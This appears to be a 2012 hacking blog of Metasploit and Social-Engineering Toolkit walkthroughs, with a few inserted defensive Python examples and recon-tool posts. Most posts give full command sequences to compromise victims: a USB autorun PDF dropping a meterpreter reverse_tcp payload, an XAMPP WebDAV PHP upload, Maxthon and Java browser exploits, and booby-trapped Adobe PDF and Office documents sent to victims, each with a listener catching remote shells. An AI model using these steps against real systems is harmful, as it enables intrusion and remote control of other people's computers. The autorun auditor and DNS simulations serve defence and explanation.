Saturday, December 29, 2012

Remote System Hacking using USB + PDF Reader Attack

Remote System Hacking using an Autorun.inf file
In this attack we use the autorun.inf file to establish the connection without the victim having to click on the file.

Requirement :
Attacker : Backtrack
Victim : Windows XP or Windows 7 with a PDF reader or similar vulnerable software such as MS Office

Step 1 : go to the Social-Engineering Toolkit directory and start it with
cd /pentest/exploits/set
./set




Step 2 : select Social-Engineering Attacks by choosing option 1


Step 3 : Select Infectious Media Generator by selecting option 3


The Infectious Media Generator creates an autorun.inf file and a Metasploit payload. These files can be copied onto a USB drive, DVD or CD; when the victim opens the media, the payload runs automatically.


Step 4 : select 1 for file-format exploits


Here is the list of payloads; select one as per your requirements. Here I am using option 11, Adobe PDF Embedded EXE Social Engineering.

Step 5 : select 1 for use your own PDF for Attack

Now enter the path to the PDF file, e.g. /home/exam-sheet.pdf (file name exam-sheet.pdf).


Step 6 : select 2 for windows/meterpreter/reverse_tcp 


Step 7 : enter the IP address of the listener (the attacker machine); here my system address is 192.168.56.101. Select port 80 as the port to connect back to; the reverse connection comes in on this port.


Step 8 : now we need to edit the autorun.inf file. Go to the autorun directory, which holds both our payload file and the autorun file, and follow these steps to edit and rename the files:

  • open a new terminal and type ls -al /pentest/exploits/set/autorun/ ; we can see two files here, the autorun file and the template
  • change into the directory with cd /pentest/exploits/set/autorun and run ls to list all files in the directory
  • type nano autorun.inf (this opens the nano editor on autorun.inf); here enter the name of the file you want opened when the USB is plugged in; I give the name exam-sheet.pdf
  • to rename the payload file, type mv template.pdf exam-sheet.pdf
  • copy both files onto the USB drive
As soon as the USB is plugged into the victim system, a meterpreter session opens.
We can list the open sessions with sessions -l and connect to a session with sessions -i 1
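A defender-side counterpart to the AutoRun step above, added here as an example and not part of SET or the original post: a small Python audit that parses an autorun.inf found on a removable volume and reports the directives that would launch or open a file on insertion. The sample autorun.inf text and the volume file list are constructed; the entry names Windows acts on (open, shellexecute, icon, action) are real. Note that once Microsoft's AutoRun update (KB971029, February 2011) is applied, Windows XP, Vista and 7 honour autorun.inf only on CD/DVD media and not on USB mass-storage devices, so a patched victim will not auto-launch anything from a USB stick.

```python
"""Audit an autorun.inf for directives that auto-launch a file on media insertion.

Added example (not SET's or the post's code). The autorun.inf text and the
volume listing below are constructed samples.
"""
import configparser
import posixpath

LAUNCH_KEYS = ("open", "shellexecute")  # directives Windows acts on when AutoRun fires
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".rtf"}
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".hta"}

# Constructed sample mirroring the post's setup: the volume auto-opens a PDF
SAMPLE_AUTORUN = """[autorun]
open=exam-sheet.pdf
icon=exam-sheet.pdf
action=Open folder to view files
"""
SAMPLE_VOLUME_FILES = ["autorun.inf", "exam-sheet.pdf", "photos/img01.jpg"]


def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys, or {} if absent/unparseable."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    # Section names are case-insensitive on Windows, but not in configparser
    for name in cp.sections():
        if name.lower() == "autorun":
            return dict(cp.items(name))
    return {}


def launch_target(value):
    """Extract the file name from an open=/shellexecute= value (first token, quotes honoured)."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return value.split()[0] if value else ""


def audit_autorun(text, volume_files):
    """Return human-readable findings for the launch directives in an autorun.inf."""
    findings = []
    section = parse_autorun(text)
    on_volume = {f.lower() for f in volume_files}
    for key in LAUNCH_KEYS:
        if key not in section:
            continue
        target = launch_target(section[key])
        ext = posixpath.splitext(target.lower())[1]
        if target.lower() not in on_volume:
            findings.append(f"{key}= points at '{target}', which is not on the volume")
        if ext in EXECUTABLE_EXTENSIONS:
            findings.append(f"{key}= runs executable '{target}' on insertion")
        elif ext in DOCUMENT_EXTENSIONS:
            findings.append(f"{key}= opens document '{target}' on insertion; check it for embedded executables")
        else:
            findings.append(f"{key}= launches '{target}' on insertion")
    # action= only sets the text of the AutoPlay prompt; a generic label disguises what open= does
    if "action" in section and any(k in section for k in LAUNCH_KEYS):
        findings.append(f"action= label '{section['action']}' masks the launch target in the AutoPlay prompt")
    return findings


if __name__ == "__main__":
    for line in audit_autorun(SAMPLE_AUTORUN, SAMPLE_VOLUME_FILES):
        print(line)
```

Run it against the autorun.inf and file listing of any volume you want to inspect; an open= or shellexecute= entry that targets a document rather than a program is exactly the pattern this post's attack produces, and is worth a closer look at the document itself.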


Friday, December 28, 2012

Remote System Hacking using XAMPP Server


XAMPP WebDAV PHP Upload :

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.
Exploit Targets :
  • XAMPP server with weak WebDAV passwords

Requirements :

Attacker : Backtrack
Victim : windows xp & windows 7

Step 1 : open a terminal and type msfconsole to start the Metasploit Framework.


Step 2 : use exploit/windows/http/xampp_webdav_upload_php



Step 3 : show payloads (lists all the payloads compatible with the exploit)



Step 4 : set RHOST 192.168.56.102 (target IP address )
Step 5 : set LHOST 192.168.56.101 (Attacker Machine IP address)
Step 6 : exploit


When the exploit starts, the reverse handler is started on the attacker machine and the PHP payload is uploaded to the victim system.



Monday, December 24, 2012

WebSploit Framework

WebSploit Framework : WebSploit is an open source project used to scan and analyse remote systems in order to find various types of vulnerabilities. The tool is very powerful and supports many vulnerability classes.




Description

WebSploit Is An Open Source Project For :
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks



----
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

Sunday, December 23, 2012

Dnstracer :Information Gathering Tool

Dnstracer : dnstracer is a pen-testing tool used for tracing a chain of DNS servers back to the source of the information.


How Does DNStracer work ?
  • It sends the specified name-server a non-recursive request for the name.
  • Non-recursive means: if the name-server knows it, it will return the data requested. If the name-server doesn't know it, it will return pointers to name-servers that are authoritative for the domain part of the name, or it will return the addresses of the root name-servers.
  • If the name server returns an authoritative answer for the name, the next server is queried. If it returns a non-authoritative answer for the name, the name servers in the authority records will be queried.
  • The program stops when all name-servers have been queried. Make sure the server you're querying doesn't do forwarding towards other servers, as dnstracer is not able to detect this for you. It does detect so-called lame servers, which are name-servers that have been told to have information about a certain domain but don't have this information.
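To make the walk described in the list above concrete, here is an added Python simulation of it; it is not dnstracer's code. The real tool sends non-recursive queries over the network, whereas this version models each name server as a small in-memory table (all server names, zones and addresses are constructed), so the trace, including the lame-server check, can be followed offline.

```python
"""Simulated dnstracer walk over a constructed, in-memory set of name servers.

Added example (not dnstracer's code). Each server is a small table rather
than a network endpoint; the walk logic is the one the text describes.
"""
from dataclasses import dataclass, field
from typing import Optional

ROOT_HINTS = ["a.root-servers.net"]  # constructed


@dataclass
class NameServer:
    records: dict = field(default_factory=dict)      # name -> [A records] served authoritatively
    delegations: dict = field(default_factory=dict)  # zone -> [names of its name servers]


# Constructed topology: root -> com -> example.com (ns1 answers, ns2 is lame)
SERVERS = {
    "a.root-servers.net": NameServer(delegations={"com": ["a.gtld-servers.net"]}),
    "a.gtld-servers.net": NameServer(delegations={"example.com": ["ns1.example.com", "ns2.example.com"]}),
    "ns1.example.com": NameServer(records={"www.example.com": ["192.0.2.10"]}),
    "ns2.example.com": NameServer(),  # listed as authoritative but holds no data: lame
}


@dataclass
class Response:
    authoritative: bool
    data: list
    referrals: list            # name servers taken from the authority section
    from_zone: Optional[str]   # delegation the referral came from; None means root hints


def in_zone(name, zone):
    return name == zone or name.endswith("." + zone)


def non_recursive_query(server, name):
    """Answer a non-recursive query the way `server` would: data, a referral, or root hints."""
    srv = SERVERS[server]
    if name in srv.records:
        return Response(True, list(srv.records[name]), [], None)
    known = [z for z in srv.delegations if in_zone(name, z)]
    if known:
        best = max(known, key=len)  # the most specific delegation wins
        return Response(False, [], list(srv.delegations[best]), best)
    return Response(False, [], list(ROOT_HINTS), None)


def trace(start_server, name):
    """Follow the delegation chain for `name` from `start_server`, querying each server once.

    Returns the query order, authoritative answers per server, and lame servers:
    servers delegated authority for a zone that reply with a referral back up the
    tree (or to the roots) instead of data for a name inside that zone.
    """
    queried, answers, lame = [], {}, []

    def walk(server, expected_zone):
        if server in queried:
            return
        queried.append(server)
        resp = non_recursive_query(server, name)
        if resp.authoritative:
            answers[server] = resp.data
            return
        refers_down = resp.from_zone is not None and (
            expected_zone is None or in_zone(resp.from_zone, expected_zone))
        if not refers_down and expected_zone is not None:
            lame.append(server)  # delegated for expected_zone, yet knows nothing about it
            return
        for ns in resp.referrals:  # either a proper referral or the root hints
            walk(ns, resp.from_zone)

    walk(start_server, None)
    return {"queried": queried, "answers": answers, "lame": lame}


if __name__ == "__main__":
    result = trace("a.root-servers.net", "www.example.com")
    for server in result["queried"]:
        if server in result["answers"]:
            print(f"{server}: answer {','.join(result['answers'][server])}")
        else:
            print(f"{server}: {'LAME' if server in result['lame'] else 'referral'}")
```

Like the real tool, this walk cannot tell a forwarding server from an authoritative one: a server that silently forwards the query would appear here as if it held the data itself, which is why the text above tells you to start from a server that does not forward.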




Syntax : dnstracer [options] [host]

dnstracer in verbose mode 




DNSmap : Information Gathering

Dnsmap: dnsmap is another DNS enumeration tool; it is used by pen-testers to gather information about the target.


Features of Dnsmap:
  • obtain all IP addresses (A records) associated to each successfully bruteforced subdomain, rather than just one IP address per subdomain
  • abort the bruteforcing process in case the target domain uses wildcards
  • ability to be able to run the tool without providing a wordlist by using a built-in list of keywords
  • bruteforcing by using a user-supplied wordlist (as opposed to the built-in wordlist)
  • saving the results in human-readable and CSV format for easy processing
  • improved built-in subdomains wordlist
  • new bash script (dnsmap-bulk.sh) included which allows running dnsmap against a list of domains from a user-supplied file. i.e.: bruteforcing several domains in a bulk fashion
  • bypassing of signature-based dnsmap detection by generating a proper pseudo-random subdomain when checking for wildcards
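The wildcard handling in the feature list above is the part most worth seeing in code, so here is an added Python example (not dnsmap's code) of a wildcard-aware subdomain check of the kind you would run against your own zones. Resolution is simulated with a constructed zone table (`ZONES`, `fake_resolve`) so it runs offline; replacing `fake_resolve` with a real lookup function is all that is needed to use it for real.

```python
"""Wildcard-aware subdomain enumeration, in the style of the dnsmap features above.

Added example (not dnsmap's code). The zone table is constructed; every
name, address and domain below is made up for the demonstration.
"""
import random
import string

# Constructed zones: example.com has real hosts, wild.example answers every name
ZONES = {
    "example.com": {"www.example.com": ["192.0.2.10", "192.0.2.11"], "mail.example.com": ["192.0.2.20"]},
    "wild.example": {"*": ["203.0.113.5"], "www.wild.example": ["203.0.113.6"]},
}


def fake_resolve(name):
    """Return all A records for `name`, honouring a '*' wildcard entry; [] if it does not exist."""
    for zone, table in ZONES.items():
        if name.endswith("." + zone):
            if name in table:
                return list(table[name])
            if "*" in table:
                return list(table["*"])
    return []


def random_label(length=12):
    # A fresh pseudo-random label on every run: a fixed probe name would be a
    # signature that an IDS or the target's DNS logs could match.
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=length))


def uses_wildcard(domain, resolve):
    """True if a name that cannot exist still resolves, i.e. the zone has a wildcard record."""
    return bool(resolve(f"{random_label()}.{domain}"))


def enumerate_subdomains(domain, wordlist, resolve):
    """Check each candidate name, keeping every A record per hit; abort on wildcard zones."""
    if uses_wildcard(domain, resolve):
        # Every guess would "succeed", so the results would be meaningless
        return {"wildcard": True, "found": {}}
    found = {}
    for word in wordlist:
        name = f"{word}.{domain}"
        ips = resolve(name)
        if ips:
            found[name] = ips  # all addresses, not just the first one
    return {"wildcard": False, "found": found}


if __name__ == "__main__":
    print(enumerate_subdomains("example.com", ["www", "mail", "ftp"], fake_resolve))
    print(enumerate_subdomains("wild.example", ["www"], fake_resolve))
```

From the defender's side, the random-label probe is also the reason wildcard records are a useful mitigation against this kind of enumeration only up to a point: they stop naive tools, but any tool that checks for wildcards first will simply report the zone as unenumerable rather than produce false hits.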

To open dnsmap in Backtrack 5, use the following menu path:

Applications>Backtrack>Information Gathering>Network Analysis>DNS analysis>dnsmap


Syntax : ./dnsmap <target-domain> [options]



DNSenum : Information Gathering

Dnsenum: Dnsenum is an information gathering tool available in Backtrack 5. We can find the following information using DNSenum:

  • Host address
  • Name server
  • MX record 
  • Sub domains
  • Whois lookups
  • Reverse lookup for netblocks
  • Google search for additional names
To open dnsenum in Backtrack 5, use the following menu path:

Applications>Backtrack>Information Gathering>Network Analysis>DNS analysis>dnsenum


Syntax:  ./dnsenum.pl [options] <domain>





Monday, December 17, 2012

Remote System Hacking using Maxthon Browser


Maxthon3 about:history XCS Trusted Zone Code Execution

Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.
Exploit Targets :
  • 0 - Maxthon 3 (prior to 3.3) on Windows (default)

Requirement :

Attacker : Backtrack
Victim : Windows

Step 1 : open a terminal and type msfconsole to start the Metasploit Framework




Step 2 : use exploit/windows/browser/maxthon_history_xcs
Step 3 : set payload windows/meterpreter/reverse_tcp
Step 4 : show options



Step 5 : set all the parameters


set SRVHOST 192.168.56.102 (IP Address of the Local Machine)
set URIPATH /  (root Address)
set LHOST 192.168.56.102 (Host IP Address)
Step 6 : exploit 

Now the reverse handler starts on 192.168.56.102:4444, our host address, and the exploit is served at the URL http://192.168.56.102:8080/. We have to send this URL to the victim; when the victim clicks on it we get a meterpreter session. Here we get two meterpreter sessions; let's check with the command sessions -l, which lists all the active sessions.

Now type sessions -i 1 to interact with the meterpreter session. Let me check sysinfo; this command gives us information about the remote system. Now type shell to get a shell on the remote system.



And now we have the command prompt of the remote system.

Friday, December 14, 2012

Remote System Hacking using Java Applet JAX-WS


Java Applet JAX-WS Remote Code Execution

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets

  • 0 - Generic (Java Payload) (default)
  • 1 - Windows Universal
  • 2 - Linux x86

Requirement :

Attacker : Backtrack
Victim PC : Windows

Step 1: open a terminal and type msfconsole



Step 2: now use exploit/multi/browser/java_jre17_jaxws


Step 3 : search for a payload; here we are using java/shell_reverse_tcp
show options


Set the required options:
set LHOST 192.168.133.130
set SRVHOST 192.168.133.130
Now exploit 



Now list the sessions with sessions -l; to access a session use sessions -i 1 (session ID).

Thursday, December 13, 2012

Hack Remote PC using Adobe Reader

Adobe Acrobat Bundled LibTIFF Integer Overflow

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.

Exploit Targets

  • Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass) (default)

Requirement :


Attacker : Backtrack
Victim PC : Windows

Step 1: open a terminal and type msfconsole


Step 2: now type use exploit/windows/fileformat/adobe_libtiff
set payload windows/meterpreter/reverse_tcp
show options

Step 3 : set the required parameters

set FILENAME result.pdf
set LHOST 192.168.56.102
exploit



Now the PDF file which we have to send is created at /root/.msf4/local/result.pdf
We have to send this file to the victim.

Step 4: to receive the reverse connection we set up a multi handler

We need a multi handler session so that we can receive the reverse connection; to do that we use

use exploit/multi/handler

and 

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit



As soon as the victim opens the file, the meterpreter session is up and the job is done.



Hack Remote PC using Microsoft Office 2007 & 2010


MS12-027 MSCOMCTL ActiveX Buffer Overflow



This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which will load after office got load, so the malicious file must be loaded through "File / Open" to achieve exploitation.


Exploit Targets

  • 0 - Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English (default)
  • 1 - Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English

Requirement

Attacker : Backtrack
Victim PC : Windows XP

Step 1: open your terminal and type msfconsole



Step 2: now type use exploit/windows/fileformat/ms12_027_mscomctrl_bof


Step 3 : set the required parameters

set payload windows/meterpreter/reverse_tcp
show options
set FILENAME Hack.doc (give the file any name you want)
set LHOST 192.168.56.102
exploit


Now the doc file which we have to send to the victim is created at /root/.msf4/local/Hack.doc
We have to send this file to the victim.

Step 4: to receive the reverse connection we set up a multi handler

We need a multi handler session so that we can receive the reverse connection; to do that we use

use exploit/multi/handler

and 

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit

As soon as the victim opens the file, the meterpreter session is up and the job is done.

Sunday, December 9, 2012

Nessus : Vulnerability Scanner

Nessus : In computer security, Nessus is a proprietary, comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.


Nessus allows scans for the following types of vulnerabilities:
  • Vulnerabilities that allow a remote hacker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc.).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets
  • Preparation for PCI DSS audits


First of all we need to register Nessus; registration provides us with an activation code.
Go to Applications>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessus>Nessus Registration.
It sends us to the Nessus website for registration; click on the home-user registration and it will provide you an activation code.
Now follow these steps.
Go to the terminal and type /opt/nessus/bin/nessus-fetch --register <code here>


Now we have to add a user. To add a user go to Applications>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessus>nessus user add
or go to the terminal and type /opt/nessus/sbin/nessus-adduser
To start Nessus go to Applications>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessus>nessus start



Saturday, December 8, 2012

Joomscan :Vulnerability Scanner

Joomscan : joomscan is a CMS vulnerability identification tool used for finding vulnerabilities in a website. joomscan is a signature-based scanner which can detect XSS, CSRF, SQL injection etc. in the website.

Go to : Backtrack>Vulnerability Assessment>Web Assessment>CMS Vulnerability Identification Tool>joomsc





Now just run ./joomscan.pl -u www.techtecno2u.com (the -u option takes the target URL)





nmap Scanning Tool (Network Mapper Tool)

How to find all systems in the network
nmap -sn 192.168.56.103



How to detect the operating system of a remote system
nmap -O 192.168.56.103


How to detect the services on the ports of a remote system
nmap -sV 192.168.56.103



How to find all supported IP protocols
nmap -sO 192.168.56.103


UDP port Scanning of Remote System
nmap -sU 192.168.56.103


TCP Port Scanning of Remote System
nmap -sT 192.168.56.103


How to scan the web server of a website
nmap -sV -T4 -F <target website>